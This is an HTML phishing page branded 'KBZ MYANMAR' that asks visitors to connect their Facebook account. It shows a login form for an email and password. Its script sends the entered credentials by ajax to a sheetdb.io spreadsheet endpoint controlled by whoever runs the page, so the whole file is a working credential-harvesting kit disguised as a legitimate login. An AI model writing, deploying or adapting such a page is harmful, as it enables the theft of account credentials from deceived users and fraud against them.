<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {font-family: Arial, Helvetica, sans-serif;}
form {border: 0px solid #f1f1f1;}

input[type=email], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

button {
  background-color: #04AA6D;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
}

button:hover {
  opacity: 0.8;
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

img.avatar {
  width: 50%;
  border-radius: 20%;
}
.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
 .center {
  text-align: center;
  color: blue;
  }
</style>
<script
src="https://code.jquery.com/jquery-3.4.1.js"
integrity="sha256-WpOohJOqMqqyKL9FccASB9O0KwACQJpFTUBLTYOVvVU="
crossorigin="anonymous"></script>
<script>
function SubForm (){
$.ajax({
url:'https://sheetdb.io/api/v1/agluegtu2me07',
type:'post',
data:$("#myForm").serializeArray(),
success: function(){
alt("Form Data Submitted :)")
},
error: function(){
alert("There was an error :(")
}
});
}
</script>
</head>
<body>
<p class="center"></p>



  <div class="imgcontainer">
  	
    <img src="https://img.utdstc.com/icon/047/268/0472685d57cbf56a960b99b820859c7b0a8fd8e38e38f419959d59024b6e5d4a" alt="Avatar" class="avatar">
  </div>
 <h1 class="center">KBZ MYANMAR</h1>
<p class="center">Contect To Your Facebook Account</p>
      
  <div class="container">
 
    <label for="uname"><b>Username</b></label>
     	<form id="myForm">
     	
    <input type="email" placeholder="Enter Username" name="email" required>

    <label for="psw"><b>Password</b></label>
      <form id="myForm">
    <input type="password" placeholder="Enter Password" name="pass" required>
              </form>
    <button type="submit"onclick="SubForm()">Login</button>
    <label>
      <input type="checkbox" checked="checked" name="remember"> Remember me
    </label>
  </div>

  <div class="container" style="background-color:#f1f1f1">
    <button type="button" class="cancelbtn">Cancel</button>
    <span class="psw">Forgot <a href="#">password?</a></span>
  </div>
</form>

</body>
</html>
